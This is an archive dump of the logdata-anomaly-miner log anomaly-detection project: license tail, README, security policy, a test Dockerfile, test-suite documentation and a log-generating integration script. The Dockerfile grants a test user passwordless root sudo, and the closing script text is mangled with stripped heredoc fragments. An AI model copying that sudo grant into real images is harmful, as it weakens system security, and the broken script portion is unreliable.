If the disclaimer of warranty and limitation of liability provided above cannot be given local legal effect according to their terms, reviewing courts shall apply local law that most closely approximates an absolute waiver of all civil liability in connection with the Program, unless a warranty or assumption of liability accompanies a copy of the Program in return for a fee. END OF TERMS AND CONDITIONS How to Apply These Terms to Your New Programs If you develop a new program, and you want it to be of the greatest possible use to the public, the best way to achieve this is to make it free software which everyone can redistribute and change under these terms. To do so, attach the following notices to the program. It is safest to attach them to the start of each source file to most effectively state the exclusion of warranty; and each file should have at least the "copyright" line and a pointer to where the full notice is found. Copyright (C) This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . Also add information on how to contact you by electronic and paper mail. If the program does terminal interaction, make it output a short notice like this when it starts in an interactive mode: Copyright (C) This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'. This is free software, and you are welcome to redistribute it under certain conditions; type `show c' for details. 
The hypothetical commands `show w' and `show c' should show the appropriate parts of the General Public License. Of course, your program's commands might be different; for a GUI interface, you would use an "about box". You should also get your employer (if you work as a programmer) or school, if any, to sign a "copyright disclaimer" for the program, if necessary. For more information on this, and how to apply and follow the GNU GPL, see . The GNU General Public License does not permit incorporating your program into proprietary programs. If your program is a subroutine library, you may consider it more useful to permit linking proprietary applications with the library. If this is what you want to do, use the GNU Lesser General Public License instead of this License. But first, please read . logdata-anomaly-miner-2.8.0/README.md000066400000000000000000000134161500476301700171710ustar00rootroot00000000000000# logdata-anomaly-miner [![Build Status](https://aecidjenkins.ait.ac.at/buildStatus/icon?job=AECID%2FAECID%2Flogdata-anomaly-miner%2Fmain)]( "https://aecidjenkins.ait.ac.at/job/AECID/job/AECID/job/logdata-anomaly-miner/job/main/") [![DeepSource](https://static.deepsource.io/deepsource-badge-light-mini.svg)](https://deepsource.io/gh/ait-aecid/logdata-anomaly-miner/?ref=repository-badge) This tool parses log data and allows to define analysis pipelines for anomaly detection. It was designed to run the analysis with limited resources and lowest possible permissions to make it suitable for production server use. [![AECID Demo – Anomaly Detection with aminer and Reporting to IBM QRadar](https://img.youtube.com/vi/tL7KiMf8NfE/0.jpg)](https://www.youtube.com/watch?v=tL7KiMf8NfE) ## Requirements In order to install logdata-anomaly-miner a **Linux system** with **python >= 3.6** is required. All **Ubuntu** and **Debian** versions that we have in the tests are currently recommended. There is only experimental support for **Fedora**. 
More specifically the tested systems include Debian Buster, Debian Bullseye, Debian Bookworm, Ubuntu 20.04, Ubuntu 22.04, Fedora (docker image fedora:latest), and RedHat (docker image redhat/ubi9). _See [requirements.txt](https://github.com/ait-aecid/logdata-anomaly-miner/requirements.txt) for further module dependencies_ ## Installation ### Debian There are Debian packages for logdata-anomaly-miner in the official Debian/Ubuntu repositories. ``` apt-get update && apt-get install logdata-anomaly-miner ``` ### From source The following command will install the latest stable release: ``` cd $HOME wget https://raw.githubusercontent.com/ait-aecid/logdata-anomaly-miner/main/scripts/aminer_install.sh chmod +x aminer_install.sh ./aminer_install.sh ``` ### Docker For installation with Docker see: [Deployment with Docker](https://github.com/ait-aecid/logdata-anomaly-miner/wiki/Deployment-with-Docker) ## Getting started Here are some resources to read in order to get started with configurations: * [Getting started](https://github.com/ait-aecid/logdata-anomaly-miner/wiki/Getting-started-(tutorial)) * [Some available configurations](https://github.com/ait-aecid/logdata-anomaly-miner/tree/main/source/root/etc/aminer/) * [Documentation](https://aeciddocs.ait.ac.at/logdata-anomaly-miner/) * [Wiki](https://github.com/ait-aecid/logdata-anomaly-miner/wiki) ## Publications Publications and talks: * Landauer M., Wurzenberger M., Skopik F., Hotwagner W., Höld G. (2023): [AMiner: A Modular Log Data Analysis Pipeline for Anomaly-based Intrusion Detection](https://dl.acm.org/doi/full/10.1145/3567675). [Digital Threats: Research and Practice](https://dl.acm.org/toc/dtrap/2023/4/1), Volume 4, Issue 1. March 2023, pp. 1–16, ACM. \[[PDF](https://dl.acm.org/doi/pdf/10.1145/3567675)\] * Wurzenberger M., Skopik F., Settanni G., Fiedler R. 
(2018): [AECID: A Self-learning Anomaly Detection Approach Based on Light-weight Log Parser Models](http://www.scitepress.org/DigitalLibrary/Link.aspx?doi=10.5220/0006643003860397). [4th International Conference on Information Systems Security and Privacy (ICISSP 2018)](http://www.icissp.org/), January 22-24, 2018, Funchal, Madeira - Portugal. INSTICC. \[[PDF](https://pdfs.semanticscholar.org/cd58/8e51d7a1d7f02f95ef2127623b21e2cd02c6.pdf)\] * Wurzenberger M., Landauer M., Skopik F., Kastner W. (2019): AECID-PG: [AECID-PG: A Tree-Based Log Parser Generator To Enable Log Analysis](https://ieeexplore.ieee.org/document/8717887). [4th IEEE/IFIP International Workshop on Analytics for Network and Service Management (AnNet 2019)](https://annet2019.moogsoft.com/) in conjunction with the [IFIP/IEEE International Symposium on Integrated Network Management (IM)](https://im2019.ieee-im.org/), April 8, 2019, Washington D.C., USA. IEEE. \[[PDF](https://ieeexplore.ieee.org/stamp/stamp.jsp?arnumber=8717887)\] * Landauer M., Skopik F., Wurzenberger M., Hotwagner W., Rauber A. (2019): [A Framework for Cyber Threat Intelligence Extraction from Raw Log Data](https://ieeexplore.ieee.org/document/9006328). [International Workshop on Big Data Analytics for Cyber Threat Hunting (CyberHunt 2019)](https://securitylab.no/cyberhunt2019/) in conjunction with the [IEEE International Conference on Big Data 2019](http://bigdataieee.org/BigData2019/), December 9-12, 2019, Los Angeles, CA, USA. IEEE. \[[PDF](https://ieeexplore.ieee.org/stamp/stamp.jsp?arnumber=9006328)\] A complete list of publications can be found at [https://aecid.ait.ac.at/further-information/](https://aecid.ait.ac.at/further-information/). ## Contribution We're happily taking patches and other contributions. 
Please see the following links for how to get started: * [ How to install a development environment ](https://github.com/ait-aecid/logdata-anomaly-miner/wiki/Installing-a-development-environment) * [ Git development workflow ](https://github.com/ait-aecid/logdata-anomaly-miner/wiki/Git-development-workflow) ## Bugs If you encounter any bugs, please create an issue on [Github](https://github.com/ait-aecid/logdata-anomaly-miner/issues). ## Security If you discover any security-related issues read the [SECURITY.md](/SECURITY.md) first and report the issues. ## License [GPL-3.0](LICENSE) ## Financial Support This project received financial support through the research projects CAIS (832345), CIIS (840842), and CISA (850199) in course of the Austrian KIRAS security research programme, the research projects synERGY (855457) and DECEPT (873980) in course of the ICT of the future programme of the Austrian Research Promotion Agency (FFG), the research project PANDORA (SI2.835928) in course of the European Defence Industrial Development Programme (EDIDP), as well as the research projects ECOSSIAN (607577) and GUARD (833456) in course of the European Seventh Framework Programme (FP7) and Horizon 2020. logdata-anomaly-miner-2.8.0/SECURITY.md000066400000000000000000000033731500476301700175040ustar00rootroot00000000000000# Security Policy ## Supported Versions | Version | Supported | | ------- | ------------------ | | 2.x.x | :white_check_mark: | | < 2.0.0 | :x: | ## Reporting a Vulnerability Please email reports about any security related issues you find to aecid@ait.ac.at. This mail is delivered to a small developer team. Your email will be acknowledged within one business day, and you'll receive a more detailed response to your email within 7 days indicating the next steps in handling your report. Please use a descriptive subject line for your report email. 
After the initial reply to your report, our team will endeavor to keep you informed of the progress being made towards a fix and announcement. In addition, please include the following information along with your report: * Your name and affiliation (if any). * A description of the technical details of the vulnerabilities. It is very important to let us know how we can reproduce your findings. * An explanation who can exploit this vulnerability, and what they gain when doing so -- write an attack scenario. This will help us evaluate your report quickly, especially if the issue is complex. * Whether this vulnerability public or known to third parties. If it is, please provide details. * Whether we could mention your name in the changelogs. Once an issue is reported we use the following disclosure process: * When a report is received, we confirm the issue and determine its severity. * If we know of specific third-party services or software based on logdata-anomaly-miner that require mitigation before publication, those projects will be notified. * Fixes are prepared for the last minor release of the latest major release. * Patch releases are published for all fixed released versions. logdata-anomaly-miner-2.8.0/aecid-testsuite/000077500000000000000000000000001500476301700210015ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/aecid-testsuite/Dockerfile000066400000000000000000000077111500476301700230010ustar00rootroot00000000000000# # PLEASE NOTE THAT YOUR WORKING-DIRECTORY MUST BE THE ROOT OF THIS REPOSITORY # IN ORDER WO BUILD THIS CONTAINER-IMAGE!!! # # Build: # docker build -f aecid-testsuite/Dockerfile -t aecid/logdata-anomaly-miner-testing:latest . 
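#
# Use:
# docker run -m=2G --rm aecid/logdata-anomaly-miner-testing runUnittests
#
# Run all tests:
# docker run -m=2G --rm aecid/logdata-anomaly-miner-testing ALL
#
# Run a shell inside the container:
# docker run -m=2G -it --rm aecid/logdata-anomaly-miner-testing SHELL
#
# See: https://github.com/ait-aecid/logdata-anomaly-miner/wiki/How-to-use-the-AECID-testsuite
#
# NOTE(review): this image is a test fixture, not a deployment image. It grants
# the "aminer" user passwordless sudo and installs unpinned tooling with pip;
# do not reuse it as a base for production containers.

# Pull base image.
FROM debian:bookworm

# Allow apt and pip to be used side by side on purpose (required since Debian
# Bookworm, see PEP 668).
ENV PIP_BREAK_SYSTEM_PACKAGES=1

# Set local timezone
ENV TZ=Europe/Vienna
RUN ln -snf /usr/share/zoneinfo/$TZ /etc/localtime && echo $TZ > /etc/timezone

LABEL maintainer="wolfgang.hotwagner@ait.ac.at"

# Install necessary debian packages (postfix was listed twice before)
ARG DEBIAN_FRONTEND=noninteractive
RUN apt-get update && apt-get install -y --no-install-recommends apt-utils
RUN apt-get update && apt-get install -y \
    python3 \
    python3-pip \
    python3-bandit \
    libacl1-dev \
    postfix \
    procps \
    mailutils \
    sudo \
    curl \
    vim \
    openjdk-17-jre \
    locales \
    locales-all \
    rsyslog \
    git \
    wget

# Enable the locales used by the tests (en_US.UTF-8 and de_AT ISO-8859-1).
RUN sed -i -e 's/# en_US.UTF-8 UTF-8/en_US.UTF-8 UTF-8/' /etc/locale.gen && \
    sed -i -e 's/# de_AT ISO-8859-1/de_AT ISO-8859-1/' /etc/locale.gen && \
    dpkg-reconfigure --frontend=noninteractive locales && \
    update-locale LANG=en_US.UTF-8

ENV LANG=en_US.UTF-8
ENV LANGUAGE=en_US:en
ENV LC_ALL=en_US.UTF-8

# Install aminer from the checked-out repository (the build context root) using
# the project's own installer.
ADD . /home/aminer/logdata-anomaly-miner
RUN cd /home/aminer/logdata-anomaly-miner && scripts/aminer_install.sh -b development -s /home/aminer/logdata-anomaly-miner

# Copy logdata-anomaly-miner-sources
ADD source/root/usr/lib/logdata-anomaly-miner /usr/lib/logdata-anomaly-miner

# Copy these files instead of symlinking them, as symlinks would need absolute paths.
ADD source/root/etc/aminer/conf-available/ait-lds/* /etc/aminer/conf-enabled/
ADD source/root/etc/aminer/conf-available/ait-lds2/* /etc/aminer/conf-enabled/
ADD source/root/etc/aminer/conf-available/generic/* /etc/aminer/conf-enabled/
ADD source/root/etc/aminer/conf-available/ait-lds /etc/aminer/conf-available/ait-lds
ADD source/root/etc/aminer/conf-available/ait-lds2 /etc/aminer/conf-available/ait-lds2
ADD source/root/etc/aminer/conf-available/generic /etc/aminer/conf-available/generic

# Entrypoint-wrapper
ADD scripts/aminerwrapper.sh /aminerwrapper.sh

# Prepare the system: executable bits, the persistence directory owned by the
# unprivileged aminer user, and a readable config directory.
RUN chmod 0755 /usr/lib/logdata-anomaly-miner/aminerremotecontrol.py \
    && mkdir -p /var/lib/aminer/log && chmod 0755 /aminerwrapper.sh \
    && chown -R aminer:aminer /var/lib/aminer && chmod 0755 /etc/aminer

# Link the compiled posix1e extension module (POSIX.1e ACL bindings) into
# aminer's library directory. The link target is a directory, so the module
# keeps its own basename. Fail the build early if the module cannot be found.
# (The previous form `FILE=$(...) ln -s $PACK .../$FILE` never expanded FILE:
# a variable assignment prefixed to a command is not visible in that command's
# own arguments, so the target was always the bare directory.)
RUN PACK=$(find /usr/lib/python3/dist-packages -name 'posix1e.cpython*.so') \
    && test -n "$PACK" \
    && ln -s $PACK /usr/lib/logdata-anomaly-miner/

# Add config
ADD source/root/etc/aminer /etc/aminer

# Wire the checkout into the test-suite layout. The NOPASSWD sudo rule exists
# because the demo/integration scripts invoke sudo themselves; it is a
# test-only grant. sudoers drop-ins are expected to be mode 0440 and must never
# be writable by anyone but root.
RUN chown -R aminer:aminer /home/aminer \
    && ln -sf /usr/lib/logdata-anomaly-miner/aminer /home/aminer/logdata-anomaly-miner/aecid-testsuite/aminer \
    && ln -s /etc/aminer/template_config.py /home/aminer/logdata-anomaly-miner/aecid-testsuite/demo/aminer/template_config.py \
    && ln -s /etc/aminer/template_config.yml /home/aminer/logdata-anomaly-miner/aecid-testsuite/demo/aminer/template_config.yml \
    && chmod +x /home/aminer/logdata-anomaly-miner/aecid-testsuite/*.sh \
    && echo "aminer ALL=(ALL) NOPASSWD:ALL" > /etc/sudoers.d/aminer \
    && chmod 0440 /etc/sudoers.d/aminer

ADD scripts/testingwrapper.sh /testingwrapper.sh
ADD source /home/aminer/source
ADD docs /home/aminer/docs

# Lint/analysis tools for the test suite. Versions are intentionally left
# unpinned here, so results may drift between builds; pin them if
# reproducibility matters.
RUN pip3 install flake8 pycodestyle vulture

# Run the tests as the unprivileged user.
USER aminer
WORKDIR /home/aminer/logdata-anomaly-miner/aecid-testsuite

# The following volumes can be mounted
VOLUME ["/etc/aminer","/var/lib/aminer","/logs"]

ENTRYPOINT ["/testingwrapper.sh"]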
logdata-anomaly-miner-2.8.0/aecid-testsuite/Readme.md000066400000000000000000000537761500476301700225420ustar00rootroot00000000000000# aecid-testsuite This project includes all kinds of tests for *AECID* and *aminer*. We used Docker instances for testing (see: [How to use the aecid-testsuite](https://github.com/ait-aecid/logdata-anomaly-miner/wiki/How-to-use-the-AECID-testsuite)). The aminer was successfully tested with all tests in **Ubuntu 20.04** and **Debian Bullseye**. In order to execute test classes the current path must be the *logdata-anomaly-miner* directory and the project structure must be as following: ## Guidelines for testing To provide the best quality of code possible we use the guidelines described in this chapter for all unittests. Before writing the unittests, a complete index should be created with all test cases for the component. This index must be reviewed with at least another person who knows the component. If the rules are followed, a reviewer should be able to see very clearly: * What is being tested? * Which INPUT is used for testing? * Which OUTPUT was expected? ### General Rules - Unittest classes must be named \Test.py - Parameter initialization: every test has to initialize it's own values to prevent unintentional changes in different test cases. - Input values must not be initialized in setup methods or as global variables. - It should be clear what input an unittest uses and what output is expected. - An unittest may only fullfill one case and no more. - Wherever possible, a test should only deliver an assert, unless the state that arises in the test is explicitly checked. - Unittests must fullfill following naming pattern (for every test class the numbering is reset): test\<#number of test\>\_\\_\ - Unittests must contain a description in form of a docstring in which the structure of the test, tested input value and expected output are described. 
- Unittests must not depend on each other, and any global changes must be reset after every test case so that every test case runs independently of the others.
├── unit ├── __init__.py ├── analysis ├── __init__.py ├── AtomFiltersTest.py ├── EnhancedNewMatchPathValueComboDetectorTest.py ├── HistogramAnalysisTest.py ├── MatchValueAverageChangeDetectorTest.py ├── MatchValueStreamWriterTest.py ├── MissingMatchPathValueDetectorTest.py ├── NewMatchPathDetectorTest.py ├── NewMatchPathValueComboDetectorTest.py ├── NewMatchPathValueDetectorTest.py ├── RulesTest.py ├── TimestampCorrectionFiltersTest.py ├── TimestampsUnsortedDetectorTest.py ├── AllowlistViolationDetectorTest.py ├── ... ├── events ├── __init__.py ├── DefaultMailNotificationEventHandlerTest.py ├── StreamPrinterEventHandlerTest.py ├── SyslogWriterEventHandlerTest.py ├── UtilsTest.py ├── ... ├── generic ├── __init__.py ├── CronParsingModelTest.py ├── input ├── __init__.py ├── ByteStreamLineAtomizerTest.py ├── LogStreamTest.py ├── SimpleByteStreamLineAtomizerFactoryTest.py ├── SimpleMultisourceAtomSyncTest.py ├── SimpleUnparsedAtomHandlerTest.py ├── ... ├── testutilities ├── config.py ├── ... ├── parsing ├── __init__.py ├── AnyByteDataModelElementTest.py ├── DateTimeModelElementTest.py ├── DebugModelElementTest.py ├── DecimalFloatValueModelElementTest.py ├── DecimalIntegerValueModelElementTest.py ├── DelimitedDataModelElementTest.py ├── FirstMatchModelElementTest.py ├── FixedDataModelElementTest.py ├── FixedWordlistDataModelElementTest.py ├── HexStringModelElementTest.py ├── IpAddressDataModelElementTest.py ├── MatchElementTest.py ├── OptionalMatchModelElementTest.py ├── ParserMatchTest.py ├── RepeatedElementDataModelElementTest.py ├── SequenceModelElementTest.py ├── VariableByteDataModelElementTest.py ├── ... ├── util ├── __init__.py ├── JsonUtilTest.py ├── PersistenceUtilTest.py ├── SecureOSFunctionsTest.py ├── ... ``` Before starting any test case the path to the *config.py* should be changed. This can be achieved recursively by using following command (*/path/to/config.py* needs to be changed.): ``` sudo find . 
-type f -name "*Test.py" -print0 | xargs -0 sed -i -e 's#/home/user/Downloads/logdata-anomaly-miner-1.0.0/logdata-anomaly-miner/source/root/etc/aminer/config.py#/path/to/config.py#g' ``` Every test case can be executed by using following command in the main directory: ``` python3 -m unittest discover -s unit -p '*Test.py' ``` Single test classes can be executed with this command: ``` python3 -m unittest ``` for example: ``` python3 -m unittest unit/parsing/AnyByteDataModelElementTest.py ``` The created mails under */var/spool/mail/root* should be deleted. ## Integration Testing: To prepare every test the associated configuration file(s) first must be copied to */tmp*. The test-scripts **MUST NOT** be run as root. In addition, **declarations.sh** must be in the **same folder** as the integration test being run. Please note that the script needs root privileges for running the *aminer* and all **persistent data is deleted** from */tmp/lib/aminer*! ### Integration Test 1: In this integration test the learning phase of the aminer is tested. Multiple log-lines are used to be learned and checked. Some analysis components are used and all other lines are handled by the *SimpleUnparsedAtomHandler*. The Events are received by a *DefaultMailNotificationEventHandler* and a *StreamPrinterEventHandler*. Other lines are used to check if the pathes were learned and persisted in the persistence directory of the *aminer*. In this test case the *SubhandlerFilter* is suitable, because only one file, */tmp/syslog*, is monitored. Following command makes the script executeable: ``` sudo chmod +x aminerIntegrationTest.sh ``` **config.py** must be copied to */tmp/config.py*. After all requirements have been met, the test can be run with the following command: ``` ./aminerIntegrationTest.sh ``` ### Integration Test 2: In this integration test multiple log files are used with the *SimpleMultisourceAtomSync*-handler with (*config22.py*) and without (*config21.py*) a defaultTimestampPath. 
Therefore the test is divided into two parts.
startTime=`date +%s` t=`date +%s` while [[ $t -lt `expr $startTime+11` ]]; do R=`shuf -i 0-86400 -n 1` echo "Random: $R" >> $LOGFILE t=`date +%s` done #Comment #MatchValueAverageChangeDetector #:<> $LOGFILE t=`date +%s` done startTime=`date +%s` t=`date +%s` while [[ $t -lt `expr $startTime+1` ]]; do R=`shuf -i 300-1000 -n 1` echo $R >> $LOGFILE t=`date +%s` done #Comment #MatchValueStreamWriter #:<> $LOGFILE t=`date +%s` sleep 0.25 done #Comment #MissingMatchPathValueDetector, NewMatchPathDetector #:<> $LOGFILE sleep 3 #MissingMatchPathValue expected echo second echo " Current Disk Data is: Filesystem Type Size Used Avail Use% dd%" >> $LOGFILE sleep 0.5 #No output expected echo third echo " Current Disk Data is: Filesystem Type Size Used Avail Use% dd%" >> $LOGFILE sleep 4 #MissingMatchPathValue expected echo fourth echo " Current Disk Data is: Filesystem Type Size Used Avail Use% dd%" >> $LOGFILE #Comment #NewMatchPathValueComboDetector, NewMatchPathValueDetector #:<> $LOGFILE t=`date +%s` sleep 0.25 done #Comment #NewMatchIdValueComboDetector #:<> $LOGFILE echo 'type=PATH msg=audit(1580367385.000:1): item=0 name="one" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL' >> $LOGFILE echo 'type=SYSCALL msg=audit(1580367386.000:2): arch=c000003e syscall=2 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)' >> $LOGFILE echo 'type=PATH msg=audit(1580367387.000:2): item=0 name="two" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL' >> $LOGFILE echo 'type=SYSCALL msg=audit(1580367388.000:3): arch=c000003e syscall=3 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 comm="apache2" 
exe="/usr/sbin/apache2" key=(null)' >> $LOGFILE echo 'type=PATH msg=audit(1580367389.000:3): item=0 name="three" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL' >> $LOGFILE echo 'type=SYSCALL msg=audit(1580367388.500:100): arch=c000003e syscall=1 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)' >> $LOGFILE echo 'type=SYSCALL msg=audit(1580367390.000:4): arch=c000003e syscall=1 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)' >> $LOGFILE echo 'type=PATH msg=audit(1580367391.000:4): item=0 name="one" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL' >> $LOGFILE echo 'type=PATH msg=audit(1580367392.000:5): item=0 name="two" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL' >> $LOGFILE echo 'type=SYSCALL msg=audit(1580367393.000:5): arch=c000003e syscall=2 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)' >> $LOGFILE echo 'type=SYSCALL msg=audit(1580367394.000:6): arch=c000003e syscall=4 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)' >> $LOGFILE echo 'type=PATH msg=audit(1580367395.000:7): item=0 name="five" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL' >> $LOGFILE echo 
'type=SYSCALL msg=audit(1580367396.000:8): arch=c000003e syscall=6 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)' >> $LOGFILE echo 'type=PATH msg=audit(1580367397.000:6): item=0 name="four" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL' >> $LOGFILE echo 'type=SYSCALL msg=audit(1580367398.000:7): arch=c000003e syscall=5 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)' >> $LOGFILE echo 'type=PATH msg=audit(1580367399.000:8): item=0 name="six" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL' >> $LOGFILE echo 'type=SYSCALL msg=audit(1580367400.000:9): arch=c000003e syscall=2 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)' >> $LOGFILE echo 'type=PATH msg=audit(1580367401.000:9): item=0 name="three" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL' >> $LOGFILE echo 'type=PATH msg=audit(1580367402.000:10): item=0 name="one" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL' >> $LOGFILE echo 'type=SYSCALL msg=audit(1580367403.000:10): arch=c000003e syscall=3 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)' >> $LOGFILE # StringRegexMatchRule echo 'type=SYSCALL 
msg=audit(1580367403.000:10): arch=c000003e syscall=3 success=no exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)' >> $LOGFILE #Comment #TimeCorrelationDetector #At least 3000 lines must be passed to trigger the TimeCorrelationDetector. #TimeCorrelationViolationDetector #The input text is saying that the time between cron job announcement and execution is 5 minutes, but in reality it is 5 seconds for more convenience. #:<> $LOGFILE sleep 4 ({ date '+%Y-%m-%d %T ' && cat /etc/hostname && echo " cron[50000]: Job \`cron.daily' started" | tr -d "\n"; } | tr -d "\n" && echo "") >> $LOGFILE sleep 10 #wrong Job Number ({ date '+%Y-%m-%d %T ' && cat /etc/hostname && echo " cron[50000]: Will run job \`cron.daily' in 5 min." | tr -d "\n"; } | tr -d "\n" && echo "") >> $LOGFILE sleep 5 ({ date '+%Y-%m-%d %T ' && cat /etc/hostname && echo " cron[50001]: Job \`cron.daily' started" | tr -d "\n"; } | tr -d "\n" && echo "") >> $LOGFILE sleep 10 #expected time difference ({ date '+%Y-%m-%d %T ' && cat /etc/hostname && echo " cron[50000]: Will run job \`cron.daily' in 5 min." | tr -d "\n"; } | tr -d "\n" && echo "") >> $LOGFILE sleep 5 ({ date '+%Y-%m-%d %T ' && cat /etc/hostname && echo " cron[50000]: Job \`cron.daily' started" | tr -d "\n"; } | tr -d "\n" && echo "") >> $LOGFILE sleep 10 #too long time difference ({ date '+%Y-%m-%d %T ' && cat /etc/hostname && echo " cron[50000]: Will run job \`cron.daily' in 5 min." 
| tr -d "\n"; } | tr -d "\n" && echo "") >> $LOGFILE sleep 7 ({ date '+%Y-%m-%d %T ' && cat /etc/hostname && echo " cron[50000]: Job \`cron.daily' started" | tr -d "\n"; } | tr -d "\n" && echo "") >> $LOGFILE sleep 10 #Comment # AllowlistRules, AllowlistViolationDetector #:<> $LOGFILE echo "User root logged in" >> $LOGFILE who | awk '{print $1,$3,$4}' | while read user time; do \ echo User $user logged in $(($(($(date +%s) - $(date -d "$time" +%s)))/60)) minutes ago.>> $LOGFILE echo User root logged in $(($(($(date +%s) - $(date -d "$time" +%s)))/60)) minutes ago. >> $LOGFILE; done #Comment #:<> $LOGFILE # AnyByteDataModelElement echo "Any:dafsdff12%3§fasß?–_=yy" >> $LOGFILE echo "Any:äöüß" >> $LOGFILE # Base64StringModelElement echo "VXNlcm5hbWU6ICJ1c2VyIgpQYXNzd29yZDogInBhc3N3b3JkIg==" >> $LOGFILE # DateTimeModelElement ({ echo "Current DateTime: " && date '+%d.%m.%Y %T' | tr -d "\n"; } | tr -d "\n" && echo "") >> $LOGFILE # DecimalFloatValueModelElement echo "-25878952156245.222239655488955" >> $LOGFILE # DecimalIntegerValueModelElement echo "- 3695465546654" >> $LOGFILE # DelimitedDataModelElement echo "This is some part of a csv file;" >> $LOGFILE # ElementValueBranchModelElement echo "match data: 25000" >> $LOGFILE # HexStringModelElement echo "b654686973206973206a7573742061206e6f726d616c2074657874" >> $LOGFILE # IpAddressModelElement echo "Gateway IP-Address: 192.168.128.225" >> $LOGFILE # IPv4InRFC1918MatchRule, ValueListMatchRule echo "Gateway IP-Address: 8.8.8.8" >> $LOGFILE # IPv4InRFC1918MatchRule, ValueListMatchRule echo "Gateway IP-Address: 8.8.4.4" >> $LOGFILE # IPv4InRFC1918MatchRule, ValueRangeMatchRule echo "Gateway IP-Address: 10.0.0.0" >> $LOGFILE # IPv4InRFC1918MatchRule, ValueRangeMatchRule echo "Gateway IP-Address: 11.0.0.0" >> $LOGFILE # MultiLocaleDateTimeModelElement echo "Feb 25 2019" >> $LOGFILE # OptionalMatchModelElement echo "The-searched-element-was-found!" 
